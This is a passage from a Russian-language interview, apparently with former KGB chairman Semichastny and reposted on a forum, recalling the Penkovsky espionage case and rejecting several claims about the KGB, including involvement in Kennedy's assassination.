командующим ракетной артиллерией сухопутных войск Советского Союза. Пеньковский, будучи у Варенцева, так сказать, холуем, настолько втерся в его семью, что ему доверяли даже ключи от дачи, на которой Пеньковский устраивал свои булимия, имея при этом какие-то связи и с дочерьми Варенцева... Ну и все прочее. Так что многое из того, что он передавал англичанам и американцам, было у него от общения с ничего не подозревавшим Варенцевым. А ведь в гостях и на переговорах у Варенцева бывали и военные, и конструкторы, и другие секретные лица. Пеньковский в подробностях знал про все его командировки в места дислокации ракетных войск. И все это передавалось на Запад. В конечном счете и Варенцев из-за него основательно пострадал: его разжаловали из маршалов артиллерии до генерал-майора. Когда я первый раз вызвал Варенцева к себе на разговор, он мне устроил такое... Мол, какое вы имеете право? Тогда я ему все выдал и сказал: «Вы что? Думаете, я лично решил с вами так разговаривать? Думаете, о том, как вы работаете и как проводите свое время, не знают в ЦК КПСС? Так что подумайте, кого вы пригрели у себя на груди и что за тип около вас крутился все это время». Он: «Ы-ы-ы-ы-ы!» Чуть ли не матом на меня. Тогда я говорю: «Вот что... или я сейчас вызову стенографистку и буду официально вести допрос, или... вот вам вопросы и... чтобы завтра вы принесли мне полностью ответы на все эти вопросы!» После этого он сразу сник. И все! А Пеньковский сам напросился на предательство. Он несколько раз подбрасывал письма и англичанам и американцам с предложением своих услуг. Как мне помнится, американцы вначале побоялись. А англичане вышли на него. И когда он стал с англичанами устанавливать связь, мы его заметили. Точнее, мы его случайно поймали на мимолетном контакте в ГУМе около фонтана. Помните: «Если вы потерялись, встречайтесь в центре ГУМа у фонтана»? Так вот, наша «наружка» (наружное наблюдение. -- Н.Д.) его там засекла. А потом его повели, повели... Мы ведь его, как говорят, пасли где-то четыре месяца. Мы сняли целый документальный фильм о Пеньковском. Этот фильм есть в архивах КГБ, но его не будут показывать, потому что нельзя его показывать, как нельзя показывать секретные документы. Между тем в этом фильме есть интересный момент, когда жена секретного сотрудника английского посольства сидит в сквере, а Пеньковский дарит девочке, которой три или четыре года, коробку конфет, и та бежит к маме, а в коробке с конфетами еще и пленки. Эта мама была как почтальон секретной почты. У нас была такая уникальная по тем временам аппаратура, которая позволяла снимать даже с крыши, как Пеньковский делал копии на подоконнике, не без оснований опасаясь, что внутренняя часть его кабинета отслеживается. Вокруг Пеньковского западные спецслужбы пытаются создать ореол «агента века» и доказать, что они завербовали одного из сверхсекретных чинов СССР.

-- Но ведь он действительно нанес стране страшный ущерб?

-- Да не-е-ет! Договорились до того, что он предотвратил атомную войну, выкрав советское сверхсекретное ракетное топливо, после чего США якобы сразу смогли нас догнать в области стратегических ракетных вооружений. Че-пу-ха! Ничего этого не было! Он пользовался всего-навсего библиотекой Главного разведуправления. Говорят, что он брал там сверхсекретные материалы и, перефотографировав, переправлял их на Запад. Спрашивается: какие сверхсекретные документы могут храниться в библиотеке даже в ГРУ? Это непозволительно было! Дело в том, что американской и английской разведкам было просто необходимо раздувать свои успехи о сверхагенте в СССР, чтобы выбить дополнительные финансы на свою деятельность.

Когда Пеньковский, будучи тайным сотрудником ГРУ Минобороны и работая легально замом начальника отдела Госкомитета СССР по науке и технике у Кириллина, ездил за границу (в Лондон и Париж), с ним там подолгу беседовали американские и английские спецслужбы. И на основании этих бесед сразу вырисовывается его истинная личность: каким мелочным и меркантильным он был, как выпрашивал всякий раз деньги и звания у иностранных разведок. Он же стал полковником трех разведок: нашей, английской и американской. И самонадеянно считал, что его теперь должна принять чуть ли не сама королева Великобритании. Он так этого хотел, что англичане были вынуждены для начала устроить ему встречу с каким-то там лордом, чтобы хоть как-то остудить ему мозги. А деньги выпрашивал якобы на подарки нужным людям. В действительности же все это делалось в личных целях. Потом деньги якобы он выбивает не только для себя, но и для Винна, который под видом английского коммерсанта был у него связным. Пеньковский говорил: «Не забывайте, что мне и Винну надо дать». И так на каждой беседе. Ему вопросы, а он сразу: сколько это будет стоить?!

Но, надо сказать, на всякий случай и я и ГРУ вынуждены были более 200 разведчиков отозвать из-за границы, потому что Пеньковский лично знал некоторых.

А вообще Пеньковский был не только тщеславным, но и неуравновешенным. От ГРУ (еще до этого) он работал в атташате нашего посольства в Турции. И там и наша резидентура, и ГРУ потребовали убрать его оттуда. И его вынуждены были отозвать оттуда, потому что он был склочник, неуравновешенная и, как итог, очень мстительная личность. Он просто не мог нормально работать в коллективе с людьми. И его единогласно выставили не только оттуда, но и из ГРУ. Он болтался без дела. И только по ходатайству Варенцева Серов его восстановил. И то... как восстановил... Когда Серов поручил своим подчиненным дать на Пеньковского характеристику и заключение, то они дали заключение, на котором Серов написал: «С такой характеристикой я не могу восстановить!» Но вместо того чтобы отказать, переделали это представление, и Серов написал: «Утверждаю». Его восстановили снова в ГРУ и под крышей ГРУ направили работать в Комитет к Кириллину, замначальника какого-то отдела. И дальше... Когда он уже работал в Госкомитете по науке и технике, семья Серова поехала за границу, и Пеньковский ее там встречал, сопровождал, водил по магазинам и даже расходовал на это часть своих денег. Через некоторое время семья Серова (жена и дочь) появляется в Париже, и Пеньковский тут как тут. И он снова водит их там по магазинам... Вплоть до злачных мест. Видите ли, дочери Серова захотелось побывать на улочках, где находятся дома терпимости и промышляют секс. Он и туда ее повел. А когда он вернулся сюда, то семья Серовых устроила ужин в его честь. И, разумеется, на этом ужине присутствовал Серов. Все это мы потом Серову напомнили и инкриминировали. Кстати, когда Варенцеву праздновали

60-летие, произошла забавная штука. На этом 60-летии, между прочим, были многие высокопоставленные лица. И даже заведующие отделами ЦК КПСС. Развернулось такое застолье! А было это на квартире, не в ресторане. Появляется Пеньковский. И дарит Варенцеву коньяк с цифрой 60, то есть якобы шестидесятилетней выдержки. Потом наши следователи установили, что этот коньяк действительно куплен в Париже, но самого рядового розлива, а рекламная наклейка вырезана Пеньковским из какого-то журнала и искусно приделана им вместо настоящей. Его даже здесь жадность подвела. Дешевый фальсификатор! Хотя западные хозяева денег не жалели. Однако и гости тоже были хороши: пили и смаковали: «Вот это коньяк!» Пеньковский даже до этого опускался. А то, что говорят, дескать, главное ракетное топливо американцам продал -- совершенная галиматья. Он не имел к этому никакого отношения! Это исключается. Однако он мог указать дислокацию и назвать какие-то типы ракет, и то не сколько, и где, и каких ракет находится, а только географию их размещения -- по командировкам Варенцева.

Разумеется, знал он и то, что Варенцев болтал на пьяную голову за столом или где-то в присутствии генералов. А Пеньковский все это слышал, когда подносил выпить или долить... И записывающее устройство у него на всякий случай было включено. Вот это было! Но что он мог найти и взять в библиотеке ГРУ? Да и в Госкомитете по науке и технике совсекретные материалы по оборонным делам никогда не проходили. И, значит, он и там не мог что-то брать. Второе. Если бы даже в библиотеке ГРУ наметился повышенный интерес какого-то сотрудника, пусть даже генерала, к каким-то темам (а там сидят не простые библиотекари), немедленно было бы сообщено куда следует и за таким любопытным установлено соответствующее наблюдение. Это ведь спецслужбы. И там не бывает, чтобы кто-то сам по себе пришел и сказал: «Дай мне то-то и то-то...» -- и все прошло бесследно. Ничего подобного. Если даже в обычных библиотеках все на учете (кто, когда и чем пользовался), то в спецбиблиотеках тем более. Все выдачи материалов происходят по спецразрешениям, а разрешения выдаются по спецуказаниям, а указания даются на основании соответствующим образом разработанных планов операций и т.д. и т.п. Бывают, конечно, какие-то отступления. Но как только они начинают носить систематический характер, об этом сразу становится известно в структурах Госбезопасности.

И в архивах ни одному рядовому и даже высокопоставленному, но постороннему сотруднику не выдадут ни одну бумагу. Прежде чем он не напишет объяснение: зачем ему это нужно? Во всяком случае, так должно быть!

Так было и с Пеньковским. Я же говорю, мы сняли ему в затылок четыре части фильма по тридцать минут. Я даже возил, показывал этот фильм Фиделю Кастро. Он еще министру своему говорил: «Смотри и учись, как это делается!» Ведь мы еще и подсовывали Пеньковскому какую-нибудь туфту, чтобы у американцев голова шла кругом. И он это все им передавал. И они принимали это за чистую монету и платили ему такие премии, что становилось ясным: клюнули! И на ответные меры соответствующие финансы вбухивали...

Потом... Пеньковский еще несколько раз должен был выехать за границу, однако мы закрыли эти выезды... Но мы его не арестовывали. Почему? Мы тянули, потому что должен был приехать сюда Винн. И мы хотели их вместе взять. А он не ехал. Приехал Винн в Будапешт. И я туда срочно послал свой самолет и Банникова с группой захвата. Так что Винна мы прихватили вместе с машиной в Будапеште... По соглашению, которое у нас было. А Пеньковского, стало быть, взяли здесь. Пеньковского мы несколько раз не выпускали за границу, хотя и боялись, что американцы могут что-то заподозрить. Но они так к нему присосались, потому что считали, что он здесь занимает такое высокое положение, что рвать с ним ну никак нельзя. Тем более что Пеньковский, как Хлестаков, был на язык мастак... Когда с ним в Лондоне и Париже работали по два-три человека от американцев и англичан, он их всех так убалтывал, что они становились похожими на персонажей из гоголевского «Ревизора». Хотя сомнения у них, конечно, возникали, но он им не давал в себя прийти, убеждая, что он со всеми, как говорится, «на дружеской ноге». И этим, разумеется, еще большую цену себе набивал. И американцы с англичанами на нем «прокололись», как городничий и свита на Хлестакове. И вот теперь, чтобы выйти из чуть ли не комедийного положения, непростительного для разведок таких сверхдержав, какими являются Америка и Англия, им приходится уже самим набивать Хлестакову... прошу прощения... Пеньковскому цену, называя его своим суперагентом века в России, в то время как у нас действительно были такие суперагенты: и Филби, и Блейк, и Абель, и даже такие, про которых они, может, только через сто лет узнают. И что самое главное, все они не чета Пеньковскому, потому как работали не за деньги, а за идею. Время еще скажет свое главное слово в защиту разведчиков, которые делают дело именно за идею, а не за деньги! Потому что они настоящие люди, а не продажные шкуры, как очень правильно говорят у нас в народе.


Впрочем, хотя вред от Пеньковского раздули как из мухи слона, он, видимо, все-таки на самом деле самый большой предатель среди наших разведчиков. Ну и... хорошо! Этому можно только радоваться.

При всем при этом я полностью опровергаю утверждение, что на СССР работали даже такие главари фашистского режима, как Борман, Геринг и еще не знаю, кого нам припишут. Хотя, казалось бы, сделай вид, что не хочешь даже разговаривать на эту тему, и соответствующие службы во всем мире сочтут: ага... значит, действительно что-то было! Однако чекистам никогда не была нужна такая дешевая слава. Зачем приписывать себе то, чего не было? Тем более когда и без всяких приписок заслуг столько, что хватит, чтобы с величайшим почтением относились к нам все агентуры мира вместе взятые. В связи с этим нельзя не сказать о Евгении Евтушенко, который договорился до того, что якобы Семичастный благодаря именно ему смог раскрыть тайну авторства вышедших на Западе под псевдонимами книг Даниэля и Синявского. Бред какой-то... Ну неужели бы я с Евтушенко, с этим не умеющим держать язык за зубами человеком, стал бы о чем-то таком договариваться? Тем более о том, чтобы он что-то там под шум воды в ванной выведал у самого министра юстиции США, которым тогда был брат Джона Кеннеди Роберт? Нет, конечно! Все о тайных публикациях Даниэля и Синявского за рубежом узнали сами разведчики, а не какие-то там деятели типа Евтушенко, выдающие себя чуть ли не за сверхсекретных агентов Семичастного. И еще, коль уж упомянули имя президента США Джона Кеннеди, скажу, что КГБ не только не был причастен к его убийству, но даже не был заинтересован в этом убийстве. Скорее наоборот, считаю своей недоработкой, что не сумели предвидеть такое убийство, ибо после благополучного разрешения Карибского кризиса между Кеннеди и Хрущевым установилось взаимопонимание, выгодное для безопасности обеих стран.


Это одновременный ответ и на другой больной вопрос советско-американских отношений: были ли у предполагаемого убийцы Джона Кеннеди Ли Харви Освальда какие-то отношения с КГБ? Да. Были. После его приезда в нашу страну и чрезвычайно неординарного шага Освальда получить политическое убежище в СССР путем попытки вскрыть себе вены в гостинице, КГБ еле удалось спасти его. Вид на жительство ему дали. Однако жить отправили хотя и не в захолустье, но подальше от Москвы. А именно в Минск. И, естественно, под негласным наблюдением спецслужб. А когда Освальд решил вернуться после женитьбы в Штаты, мы только облегченно вздохнули и не стали чинить ему никаких препятствий, а тем более давать какие-то задания от КГБ. Вот и вся, если коротко, правда о Ли Харви Освальде, попытавшемся побыть гражданином двух сверхдержав, но никак не суперагентом КГБ. Это понимают все трезвомыслящие политики США. Не понимают этого только падкие на сенсации интриганы от журналистики и те, кому нормальные взаимовыгодные отношения между Америкой и Россией в тягость. К сожалению, подобных безответственных интриганов хватает и в наших СМИ. Вот, скажем, благообразный диктор НТВ Михаил Осокин. Тоже любитель таких дурных вещей. Однажды он на весь мир выдал, что в окружении королевы Англии был агент, который выходил только на Семичастного. Я звоню на НТВ и говорю: «Откуда вы все это берете? Зачем вам надо туманить мозги всему миру?.. Вы хоть понимаете, что такое окружение королевы и что значит мне иметь на связи человека из этого окружения? Зачем?» Да. Некоторые иностранные послы работали с нами и имели со мной связь, но ведь это совсем другое дело. И королева Англии тут ну совершенно ни при чем. Это такая же нелепость, как и то, что люди из КГБ сожгли Пеньковского в топке. Да... много сказок о КГБ!

Страница 2 из 2 Часовой пояс: UTC + 3 часа
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/